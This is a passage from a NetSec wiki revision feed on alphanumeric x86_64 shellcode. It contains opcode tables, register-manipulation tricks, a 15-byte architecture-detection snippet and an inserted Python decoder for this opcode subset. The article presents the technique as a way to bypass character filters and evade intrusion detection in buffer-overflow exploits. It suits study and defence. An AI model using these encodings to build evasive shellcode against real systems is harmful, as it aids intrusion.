NetSec - User contributions [en], Atom feed https://nets.ec/api.php?action=feedcontributions&user=DPYJulietowbaijc&feedformat=atom (generated 2024-03-29T02:35:00Z by MediaWiki 1.25.1)<br />
Alphanumeric shellcode, revision of 2012-09-19T16:26:00Z: https://nets.ec/index.php?title=Alphanumeric_shellcode&diff=9080<br />
<p>DPYJulietowbaijc: /* Alphanumeric opcode compatibility */</p>
<hr />
<div><center>'''Alphanumeric [[shellcode]]''' is similar to [[ascii shellcode]] in that it is used to [[filter bypass|bypass character filters]] and [[IDS evasion|evade intrusion-detection]] during [[Buffer Overflows|buffer overflow]] [[exploitation]].</center>{{info|<center>This article documents alphanumeric code on [[#15_byte_architecture_detection_shellcode|multiple architectures]], but primarily the '''64 bit''' x86 architecture.</center>}}<br />
{{prereq|[[bitwise math]], [[assembly]] and [[shellcode]].}}<br />
<br />
= Available x86_64 instructions =<br />
{{info|This chart contains '''64-bit''' alphanumeric opcodes. 32-bit alphanumeric opcodes are available at the 32-bit [[ascii shellcode]] entry. When limited to instructions whose opcode bytes are ASCII letters or digits, programmers must emulate every other required instruction using only the instructions available.}}<br />
<br />
<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Numeric<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
! scope="row" | 0<br />
| 0x30<br />
| xor %{16bit}, (%{64bit})<br />
|-<br />
! scope="row" | 1<br />
| 0x31<br />
| xor %{32bit}, (%{64bit})<br />
|-<br />
! scope="row" | 2<br />
| 0x32<br />
| xor (%{64bit}), %{16bit}<br />
|-<br />
! scope="row" | 3<br />
| 0x33<br />
| xor (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | 4<br />
| 0x34<br />
| xor [byte], %al<br />
|-<br />
! scope="row" | 5<br />
| 0x35<br />
| xor [dword], %eax<br />
|-<br />
! scope="row" | 6<br />
| 0x36<br />
| %ss segment register<br />
|-<br />
! scope="row" | 7<br />
| 0x37<br />
| Bad Instruction!<br />
|-<br />
! scope="row" | 8<br />
| 0x38<br />
| cmp %{16bit}, (%{64bit})<br />
|-<br />
! scope="row" | 9<br />
| 0x39<br />
| cmp %{32bit}, (%{64bit})<br />
|-<br />
|}<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Uppercase<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
<br />
! scope="row" | A<br />
| 0x41<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | B<br />
| 0x42<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | C<br />
| 0x43<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | D<br />
| 0x44<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | E<br />
| 0x45<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | F<br />
| 0x46<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | G<br />
| 0x47<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | H<br />
| 0x48<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | I<br />
| 0x49<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | J<br />
| 0x4a<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | K<br />
| 0x4b<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | L<br />
| 0x4c<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | M<br />
| 0x4d<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | N<br />
| 0x4e<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | O<br />
| 0x4f<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | P<br />
| 0x50<br />
|push %rax<br />
|-<br />
! scope="row" | Q<br />
| 0x51<br />
|push %rcx<br />
|-<br />
! scope="row" | R<br />
| 0x52<br />
|push %rdx<br />
|-<br />
! scope="row" | S<br />
| 0x53<br />
|push %rbx<br />
|-<br />
! scope="row" | T<br />
| 0x54<br />
|push %rsp<br />
|-<br />
! scope="row" | U<br />
| 0x55<br />
|push %rbp<br />
|-<br />
! scope="row" | V<br />
| 0x56<br />
|push %rsi<br />
|-<br />
! scope="row" | W<br />
| 0x57<br />
|push %rdi<br />
|-<br />
! scope="row" | X<br />
| 0x58<br />
|pop %rax<br />
|-<br />
! scope="row" | Y<br />
| 0x59<br />
|pop %rcx<br />
|-<br />
! scope="row" | Z<br />
| 0x5a<br />
|pop %rdx<br />
|-<br />
|}<br />
<br />
<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Lowercase<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
<br />
! scope="row" | a<br />
| 0x61<br />
|Bad Instruction!<br />
|-<br />
! scope="row" | b<br />
| 0x62<br />
|Bad Instruction!<br />
|-<br />
! scope="row" | c <br />
| 0x63<br />
|movslq (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | d<br />
| 0x64<br />
|%fs segment register<br />
|-<br />
! scope="row" | e<br />
| 0x65<br />
| %gs segment register<br />
|-<br />
! scope="row" | f<br />
| 0x66<br />
| 16 bit operand override<br />
|-<br />
! scope="row" | g<br />
| 0x67<br />
| 16 bit ptr override<br />
|-<br />
! scope="row" | h<br />
| 0x68<br />
|push [dword]<br />
|-<br />
! scope="row" | i<br />
| 0x69<br />
|imul [dword], (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | j<br />
| 0x6a<br />
|push [byte]<br />
|-<br />
! scope="row" | k<br />
| 0x6b<br />
|imul [byte], (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | l<br />
| 0x6c<br />
|insb (%dx),%es:(%rdi)<br />
|-<br />
! scope="row" | m<br />
| 0x6d<br />
|insl (%dx),%es:(%rdi)<br />
|-<br />
! scope="row" | n<br />
| 0x6e<br />
|outsb %ds:(%rsi),(%dx)<br />
|-<br />
! scope="row" | o<br />
| 0x6f<br />
|outsl %ds:(%rsi),(%dx)<br />
|-<br />
! scope="row" | p<br />
| 0x70<br />
| jo [byte]<br />
|-<br />
! scope="row" | q<br />
| 0x71<br />
| jno [byte]<br />
|-<br />
! scope="row" | r<br />
| 0x72<br />
| jb [byte]<br />
|-<br />
! scope="row" | s<br />
| 0x73<br />
| jae [byte]<br />
|-<br />
! scope="row" | t<br />
| 0x74<br />
| je [byte]<br />
|-<br />
! scope="row" | u<br />
| 0x75<br />
| jne [byte]<br />
|-<br />
! scope="row" | v<br />
| 0x76<br />
| jbe [byte]<br />
|-<br />
! scope="row" | w<br />
| 0x77<br />
| ja [byte]<br />
|-<br />
! scope="row" | x<br />
| 0x78<br />
| js [byte]<br />
|-<br />
! scope="row" | y<br />
| 0x79<br />
| jns [byte]<br />
|-<br />
! scope="row" | z<br />
| 0x7a<br />
| jp [byte]<br />
|-<br />
|}<br />
<br />
= Alphanumeric opcode compatibility =<br />
Intercompatible opcodes are worth noting because many alphanumeric opcodes have the same meaning on both architectures, which makes it possible to write [[shellcode]] that runs on both 32 bit and 64 bit x86 platforms. <br />
<br />
== Alphanumeric inter-compatible x86 opcodes ==<br />
This chart was derived by cross referencing [[#Available_x86_64_instructions|available 64 bit instructions]] with [[Ascii_shellcode#Available_Instructions|available 32 bit instructions]].<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Intercompatible x86* Alphanumeric Opcodes<br />
|-<br />
! scope="col" | Hex<br />
! scope="col" | ASCII<br />
! scope="col" | Assembler Instruction<br />
|-<br />
! scope="row" | 0x64, 0x65<br />
| d,e<br />
|[fs &#x7c; gs] prefix<br />
|-<br />
! scope="row" | 0x66, 0x67<br />
| f,g<br />
| 16bit [operand &#x7c; ptr] override<br />
|-<br />
! scope="row" | 0x68, 0x6a<br />
| h,j<br />
| push<br />
|-<br />
! scope="row" | 0x69, 0x6b<br />
| i,k<br />
| imul<br />
|-<br />
! scope="row" | 0x6c-0x6f<br />
| l-o<br />
| ins[bwd], outs[bwd]<br />
|-<br />
! scope="row" | 0x70-0x7a<br />
| p-z<br />
| Conditional Jumps<br />
|-<br />
! scope="row" | 0x30-0x35<br />
| 0-5<br />
| xor<br />
|-<br />
! scope="row" | 0x36<br />
| 6<br />
| %ss segment register<br />
|-<br />
! scope="row" | 0x38-0x39<br />
| 8,9<br />
| cmp<br />
|-<br />
! scope="row" | 0x50-0x57<br />
| P-W<br />
| push *x, *i, *p<br />
|-<br />
! scope="row" | 0x58-0x5a<br />
| XYZ<br />
| pop [*ax, *cx, *dx]<br />
|-<br />
|}<br />
<br />
Because not ''all'' opcodes are intercompatible, yet comparisons and conditional jumps ''are'', the architecture of an x86 processor can be determined using exclusively alphanumeric opcodes. The opcodes that are specifically not compatible are the 64 bit special prefixes '''0x40-0x4f''', which allow manipulation of 64 bit registers and of the 8 additional 64 bit general purpose registers, '''%r8-%r15'''. By using one of these additional registers (which 32 bit processors do not have), a single byte sequence can be made to set a value in a different register on each of the two processors. A comparison against one of the two registers then reveals whether the value was set. Given the instruction limitations, '''pop''' is the most effective way to set the value of a register. Keeping a copy of the stack pointer in a register other than %rsp or %esp makes an effective comparison possible: whether the value of a register equals the most recent thing pushed to or popped from the stack.<br />
<br />
==15 byte architecture detection shellcode==<br />
{{info|This bytecode does not have a conditional jump. The reader may add this for customization based on the size and architecture of the payload that occurs after this snippet.}}<br />
This simple alphanumeric bytecode is 15 bytes long, ending in a comparison which returns '''equal''' on a 32 bit system and '''not equal''' on a 64 bit system. The conditional jump may be best reserved for the '''t''' and '''u''' instructions, '''jump if equal''' and '''jump if not equal''', respectively.<br />
<br />
* Assembled:<br />
'''TX4HPZTAZAYVH92'''<br />
<br />
* Disassembly:<br />
[root@ares bha]# objdump -d xarch32.o<br />
<br />
xarch32.o: file format elf32-i386<br />
<br />
Disassembly of section .text:<br />
00000000 <_start>:<br />
0: 54 push %esp<br />
1: 58 pop %eax<br />
2: 34 48 xor $0x48,%al<br />
4: 50 push %eax<br />
5: 5a pop %edx<br />
6: 54 push %esp<br />
7: 41 inc %ecx<br />
8: 5a pop %edx<br />
9: 41 inc %ecx<br />
a: 59 pop %ecx<br />
b: 56 push %esi<br />
c: 48 dec %eax<br />
d: 39 32 cmp %esi,(%edx)<br />
[root@ares bha]# # Returns not-equal on a 64 bit system:<br />
[root@ares bha]# objdump -d xarch64.o<br />
<br />
xarch64.o: file format elf64-x86-64<br />
<br />
<br />
Disassembly of section .text:<br />
<br />
0000000000000000 <_start>:<br />
0: 54 push %rsp<br />
1: 58 pop %rax<br />
2: 34 48 xor $0x48,%al<br />
4: 50 push %rax<br />
5: 5a pop %rdx<br />
6: 54 push %rsp<br />
7: 41 5a pop %r10<br />
9: 41 59 pop %r9<br />
b: 56 push %rsi<br />
c: 48 39 32 cmp %rsi,(%rdx)<br />
<br />
On a 64-bit system, this will not cause a segfault because (%rdx) still points somewhere inside the stack: %rdx is the original stack pointer with only bits 3 and 6 flipped by the xor with 0x48. Also notice that while this was assembled as a [[Linux]]-based ELF executable, the [[Operating System]] should not matter, as the sequence stays within the confines of legal instructions for any x86 CPU and should not cause an access violation.<br />
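The following Python decoder is an added example, not code from the original article. It reads a byte string under both the 32-bit and the 64-bit interpretation of the opcode tables above (push/pop, the REX-versus-inc/dec split, the 0x31/0x33/0x39 ModRM forms, immediates, prefixes and conditional jumps) and reports the first offset at which the two architectures stop agreeing on instruction boundaries, which for the 15 byte sample is the 'A' at offset 7. It also decodes the 3X? and 6H31 style operand notation used later on this page; imul, movslq, byte-register and SIB forms are outside its scope.

```python
"""Two-mode decoder for the alphanumeric x86 opcode subset tabulated above.

Added example, not code from the original article. A byte string is decoded
both as 32-bit and as 64-bit x86 using only the opcode classes the tables
list, so the byte at which the two architectures stop agreeing becomes
visible. ModRM forms needing a SIB byte (rm == 4) or a disp32 (mod == 0,
rm == 5) are reported rather than guessed, and the byte-register, imul
and movslq forms are left out to keep the decoder short.
"""

REG = {64: ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"],
       32: ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"],
       16: ["ax", "cx", "dx", "bx", "sp", "bp", "si", "di"]}
JCC = ["jo", "jno", "jb", "jae", "je", "jne", "jbe", "ja", "js", "jns", "jp"]
SEG = {0x36: "ss", 0x64: "fs", 0x65: "gs"}
# opcode -> (mnemonic, operand order): "mr" = register is the source, "rm" = the destination
MODRM_OPS = {0x31: ("xor", "mr"), 0x33: ("xor", "rm"), 0x39: ("cmp", "mr")}


def regname(n, size):
    """AT&T register name; n >= 8 is only reachable through a REX prefix in 64-bit mode."""
    if n < 8:
        return "%" + REG[size][n]
    return "%%r%d%s" % (n, {64: "", 32: "d", 16: "w"}[size])


def modrm(code, i, mode, rex, size, seg):
    """Decode the ModRM byte at code[i]; returns (reg operand, memory operand, bytes used) or None."""
    b = code[i]
    mod, reg, rm = b >> 6, (b >> 3) & 7, b & 7
    if mod > 1 or rm == 4 or (mod == 0 and rm == 5):
        return None                          # register-direct, SIB or disp32 form: not handled here
    reg_op = regname(reg + (8 if rex & 4 else 0), size)                   # REX.R extends reg
    base = regname(rm + (8 if rex & 1 else 0), 64 if mode == 64 else 32)  # REX.B extends rm
    disp = ""
    if mod == 1:                             # one signed displacement byte follows the ModRM byte
        d = code[i + 1] - 256 if code[i + 1] > 127 else code[i + 1]
        disp = ("-0x%x" % -d) if d < 0 else ("0x%x" % d)
    return reg_op, "%s%s(%s)" % (("%%%s:" % seg) if seg else "", disp, base), 1 + mod


def decode(code, mode):
    """Return [(offset, hex bytes, asm)] for code decoded as 32-bit or 64-bit x86."""
    out, i = [], 0
    while i < len(code):
        start, rex, size, seg = i, 0, 32, None
        while i < len(code) and (code[i] in SEG or code[i] == 0x66):       # legacy prefixes
            size, seg = (16, seg) if code[i] == 0x66 else (size, SEG[code[i]])
            i += 1
        while mode == 64 and i < len(code) and 0x40 <= code[i] <= 0x4f:    # REX: 64-bit mode only,
            rex, i = code[i] & 0xf, i + 1                                  # the last REX byte wins
        if rex & 8:
            size = 64                                                      # REX.W: 64-bit operands
        if i >= len(code):
            out.append((start, code[start:].hex(), "(dangling prefix)"))
            break
        op, i = code[i], i + 1
        ext = 8 if rex & 1 else 0
        try:
            if 0x40 <= op <= 0x4f:                                         # 32-bit mode: inc/dec r32
                asm = "%s %s" % ("inc" if op < 0x48 else "dec", regname(op & 7, size))
            elif 0x50 <= op <= 0x5f:                                       # push/pop; REX.B -> r8-r15
                psize = 16 if size == 16 else (64 if mode == 64 else 32)
                asm = "%s %s" % ("push" if op < 0x58 else "pop", regname((op & 7) + ext, psize))
            elif op == 0x34:
                asm, i = "xor $0x%x,%%al" % code[i], i + 1
            elif op in (0x35, 0x68):                                       # imm32 (imm16 after 0x66)
                n = 2 if size == 16 else 4
                if len(code) - i < n:
                    raise IndexError
                imm = int.from_bytes(code[i:i + n], "little")
                asm = "xor $0x%x,%s" % (imm, regname(0, size)) if op == 0x35 else "push $0x%x" % imm
                i += n
            elif op == 0x6a:
                asm, i = "push $0x%x" % code[i], i + 1
            elif 0x70 <= op <= 0x7a:                                       # jcc rel8, relative to next ip
                rel = code[i] - 256 if code[i] > 127 else code[i]
                i += 1
                asm = "%s 0x%x" % (JCC[op - 0x70], i + rel)
            elif op in MODRM_OPS:
                mn, order = MODRM_OPS[op]
                parts = modrm(code, i, mode, rex, size, seg)
                if parts is None:
                    out.append((start, code[start:i + 1].hex(), "(addressing form not handled)"))
                    break
                reg_op, mem, used = parts
                i += used
                asm = "%s %s,%s" % ((mn,) + ((reg_op, mem) if order == "mr" else (mem, reg_op)))
            else:
                out.append((start, code[start:i].hex(), "(opcode not handled)"))
                break
        except IndexError:
            out.append((start, code[start:].hex(), "(truncated instruction)"))
            break
        out.append((start, code[start:i].hex(), asm))
    return out


def first_divergence(code):
    """Offset of the first instruction whose length differs between the two readings, else None."""
    a = {off: len(hx) // 2 for off, hx, _ in decode(code, 32)}
    b = {off: len(hx) // 2 for off, hx, _ in decode(code, 64)}
    return next((off for off in sorted(a) if b.get(off) != a[off]), None)
```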
<br />
=Alphanumeric x86_64 register value and data manipulation=<br />
<br />
Given the limited instruction set of alphanumeric shellcode, it is important to note the different methods of manipulating registers within those confines. Identifying these leads to '''mov emulations''', which make up most of the actual code.<br />
<br />
==Push: alphanumeric x86_64 registers==<br />
<br />
Alphanumeric data can be pushed in one-byte, two-byte, and four-byte quantities at once.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''One-byte, two-byte, and four-byte quantities'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pushw [word]<br />
| \x66\x68\x##\x##<br />
| fh??<br />
|-<br />
| pushq [byte]<br />
| \x6a\x##<br />
| j?<br />
|-<br />
| pushq [dword]<br />
| \x68\x##\x##\x##\x##<br />
| h????<br />
|}<br />
<br />
<br />
Pushing the 64 bit registers RAX-RDI is done using a single upper case P-W (\x50-\x57) dependent on which register is being pushed. Prefixing with "A" (for general registers R8-R15) or "f" for 16 bit registers (AX-DI) gives access to push 32 registers using alphanumeric shellcode.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 Extended Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %rax <br />
| \x50<br />
| P<br />
|-<br />
| push %rcx<br />
| \x51<br />
| Q<br />
|-<br />
| push %rdx<br />
| \x52<br />
| R<br />
|-<br />
| push %rbx<br />
| \x53<br />
| S<br />
|-<br />
| push %rsp <br />
| \x54<br />
| T<br />
|-<br />
| push %rbp<br />
| \x55<br />
| U<br />
|-<br />
| push %rsi<br />
| \x56<br />
| V<br />
|-<br />
| push %rdi<br />
| \x57<br />
| W<br />
|}<br />
<br />
<br />
For the general registers R8-R15 "A" is prefixed to the corresponding RAX-RDI register push. <br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %r8<br />
| \x41\x50<br />
| AP<br />
|-<br />
| push %r9<br />
| \x41\x51<br />
| AQ<br />
|-<br />
| push %r10<br />
| \x41\x52<br />
| AR<br />
|-<br />
| push %r11<br />
| \x41\x53<br />
| AS<br />
|-<br />
| push %r12<br />
| \x41\x54<br />
| AT<br />
|-<br />
| push %r13<br />
| \x41\x55<br />
| AU<br />
|-<br />
| push %r14<br />
| \x41\x56<br />
| AV<br />
|-<br />
| push %r15<br />
| \x41\x57<br />
| AW<br />
|}<br />
<br />
<br />
For the 16 bit registers AX-DI "f" is prefixed to the corresponding RAX-RDI register push.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 16 bit Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %ax<br />
| \x66\x50<br />
| fP<br />
|-<br />
| push %cx<br />
| \x66\x51<br />
| fQ<br />
|-<br />
| push %dx<br />
| \x66\x52<br />
| fR<br />
|-<br />
| push %bx<br />
| \x66\x53<br />
| fS<br />
|-<br />
| push %sp<br />
| \x66\x54<br />
| fT<br />
|-<br />
| push %bp<br />
| \x66\x55<br />
| fU<br />
|-<br />
| push %si<br />
| \x66\x56<br />
| fV<br />
|-<br />
| push %di<br />
| \x66\x57<br />
| fW<br />
|}<br />
<br />
<br />
For the 16 bit general registers R8W-R15W "f" is prefixed to the corresponding R8-R15 register push.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 16 bit General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %r8w<br />
| \x66\x41\x50<br />
| fAP<br />
|-<br />
| push %r9w<br />
| \x66\x41\x51<br />
| fAQ<br />
|-<br />
| push %r10w<br />
| \x66\x41\x52<br />
| fAR<br />
|-<br />
| push %r11w<br />
| \x66\x41\x53<br />
| fAS<br />
|-<br />
| push %r12w<br />
| \x66\x41\x54<br />
| fAT<br />
|-<br />
| push %r13w<br />
| \x66\x41\x55<br />
| fAU<br />
|-<br />
| push %r14w<br />
| \x66\x41\x56<br />
| fAV<br />
|-<br />
| push %r15w<br />
| \x66\x41\x57<br />
| fAW<br />
|}<br />
<br />
==Pop: alphanumeric x86_64 registers==<br />
<br />
Pop is more limited in its range of usable registers due to the limitations of alphanumeric shellcode: only RAX, RCX, and RDX can be popped directly. As with push, prefixes give access to the 16 bit and general registers, for a total of 12 registers (6 full size and 6 16 bit) that can be popped. <br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Pop: X86_64 Extended Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pop %rax <br />
| \x58<br />
| X<br />
|-<br />
| pop %rcx<br />
| \x59<br />
| Y<br />
|-<br />
| pop %rdx<br />
| \x5a<br />
| Z<br />
|}<br />
<br />
<br />
For general registers, the RAX-RDX pops are prefixed with "A" to obtain the corresponding R8-R10 pops. <br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Pop: X86_64 General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pop %r8 <br />
| \x41\x58<br />
| AX<br />
|-<br />
| pop %r9<br />
| \x41\x59<br />
| AY<br />
|-<br />
| pop %r10<br />
| \x41\x5a<br />
| AZ<br />
|}<br />
<br />
<br />
16 bit registers (using 0x66 or 'f' [sometimes fA] prefix):<br />
<br />
{| border="1" cellpadding="5" cellspacing="0" align="center"<br />
! Assembly<br />
! Hexadecimal<br />
! Alphanumeric ASCII <br />
|-<br />
| pop %ax<br />
| \x66\x58<br />
| fX<br />
|-<br />
| pop %cx<br />
| \x66\x59<br />
| fY<br />
|-<br />
| pop %dx<br />
| \x66\x5a<br />
| fZ<br />
|-<br />
| pop %r8w<br />
| \x66\x41\x58<br />
| fAX<br />
|-<br />
| pop %r9w<br />
| \x66\x41\x59<br />
| fAY<br />
|-<br />
| pop %r10w<br />
| \x66\x41\x5a<br />
| fAZ<br />
|}<br />
<br />
Using push and pop the values of 6 fullsize CPU registers can be set:<br />
<br />
*%rax<br />
*%rcx<br />
*%rdx<br />
*%r8<br />
*%r9<br />
*%r10<br />
<br />
Or get any values of 16 fullsize CPU registers to the top of the stack:<br />
<br />
*%r8-%r15<br />
*%rax-%rdi<br />
<br />
== Prefixes ==<br />
<br />
Examining this next section, there are 5 main registers (and 5 special 64 bit registers, %r11-%r15) that can be push(ed), but not pop(ed):<br />
<br />
*%rbx<br />
*%rsp<br />
*%rbp<br />
*%rsi<br />
*%rdi<br />
<br />
Setting these with alphanumeric bytecode instructions and operands is only possible through the 6 fully controlled registers, by emulating mov with push and pop. Using only the registers already accessed, the following sections work out instruction sequences that set their values.<br />
<br />
The special register prefix has been identified:<br />
<br />
0x41, 'A'<br />
<br />
The word operand override has been identified, <br />
<br />
0x66, 'f'.<br />
<br />
Note the identification of all the alphanumeric overrides and prefixes. These overrides are very similar to those for 32 bit platforms.<br />
<br />
{| class="wikitable"<br />
! Hex Value<br />
! Alpha Value<br />
! Description<br />
|-<br />
| 0x36<br />
| 6<br />
| %ss segment override<br />
|-<br />
| 0x64<br />
| d<br />
| %fs segment override<br />
|-<br />
| 0x65<br />
| e<br />
| %gs segment override<br />
|-<br />
| 0x66<br />
| f<br />
| 16-bit operand size<br />
|-<br />
| 0x67<br />
| g<br />
| 16-bit address size<br />
|-<br />
| 0x41<br />
| A<br />
| 64-bit special register use (%r##)<br />
|-<br />
| 0x48<br />
| H<br />
| 64-bit register size override<br />
|-<br />
| 0x41-0x4f<br />
| A-O<br />
| Special 64-bit overrides (REX prefixes)<br />
|}<br />
<br />
== Operands ==<br />
<br />
Opcodes used for popping a register can also serve as 'register operands' (the ModRM byte) of more advanced instructions. For example, take this xor instruction:<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor 0x[byte](%rax),%ebx</syntaxhighlight><br />
| \x33\x58\x##<br />
| 3X?<br />
|}<br />
<br />
The %rax register can be changed to %rcx or %rdx using the 0x59 (Y) and 0x5a (Z) opcodes in place of the 0x58 (X) opcode:<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor 0x[byte](%rcx),%ebx</syntaxhighlight><br />
| \x33\x59\x##<br />
| 3Y?<br />
|}<br />
<br />
Whenever there is a controllable register, the notation {reg} marks it as an option. In the hexadecimal column, \x?? stands for the register-operand byte and \x## for an arbitrary byte; in the ASCII column, '*' denotes the register operand and '?' the arbitrary byte, for example:<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
|<syntaxhighlight lang="asm">xor 0x[byte]({reg}),%ebx</syntaxhighlight><br />
| \x33\x??\x##<br />
| 3*?<br />
|}<br />
<br />
The opcodes for '''%rax''', '''%rcx''', and '''%rdx''' are important and thus will be used frequently. When encountering multiple operands, the operand number is used in the notation for readability purposes.<br />
<br />
== The rbx, rsp, and rbp registers ==<br />
Identifying the ways to set the rest of the registers while investigating %rbx was not entirely fruitful. Full control over the %rbx register is not available, however, write access to its sub-registers is available:<br />
* %ebx<br />
* %bx<br />
* %bh<br />
* %bl<br />
<br />
Upon further investigation, this opened up access to multiple additional registers using:<br />
*Xor<br />
*Imul<br />
*Movslq<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor 0x[byte]({reg64}),{reg32}</syntaxhighlight><br />
| \x33\x??\x#1<br />
| 3*1<br />
|-<br />
| <source lang="asm">imul $0x[dword1],0x[byte2]({reg64}),{reg32}</source><br />
| \x69\x??\x#2\x#1\x#1\x#1\x#1<br />
| i*21111<br />
|-<br />
| <source lang="asm">imul $0x[byte1],0x[byte2]({reg64}), {reg32}</source><br />
| \x6b\x??\x#2\x#1<br />
| k*21<br />
|-<br />
| <source lang="asm">movslq 0x[byte1]({reg64}), {reg32}</source><br />
| \x63\x??\x#1<br />
| c*1<br />
|}<br />
<br />
To access the %ss segment, insert the prefix at the beginning of the bytecode of the instruction (e.g. "63*?" instead of "3*?"). To use the special 64 bit registers, 0x41 or "A" is placed at the beginning of the bytecode. If both are required, the %ss segment prefix must always come first, e.g. '6A3*?'. Using one of the 64 bit force operators (in this case 0x48, "H"), any of those instructions can be applied to a 32 bit register with an override that treats it as its 64-bit counterpart.<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <source lang="asm">imul $0x[byte1],0x[byte2]({reg64}),{reg64}</source><br />
| \x48\x6b\x??\x#2\x#1<br />
| Hk*21<br />
|}<br />
<br />
To set the value of %rbx directly, imul, xor, and movslq can be used. It's similar for other registers:<br />
* %rbp<br />
* %rsp<br />
<br />
==Xor==<br />
Left over are %rsp, %rbp, %rdi, and %rsi. Taking a closer look at xor, the opcodes from 0x30 to 0x35 give these valuable xor forms:<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x34<br />
| <syntaxhighlight lang="asm">xor $0x##, %al</syntaxhighlight><br />
|-<br />
| 0x35<br />
| <syntaxhighlight lang="asm">xor $0x########, %eax</syntaxhighlight><br />
|-<br />
| 0x48 0x35<br />
| <syntaxhighlight lang="asm">xor $0x########, %rax</syntaxhighlight><br />
|}<br />
<br />
'''0x30''' is a multi-byte xor instruction: the opcode is followed by a ModRM byte (and possibly a SIB byte and a displacement) that names both operands, a register and a memory location:<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x30<br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit},%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit},%{64bit},2)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](,%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](,%{64bit},2)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](,%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](,%{64bit},2)</syntaxhighlight><br />
|}<br />
<br />
'''0x31''' is as flexible as '''0x30'''. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x31<br />
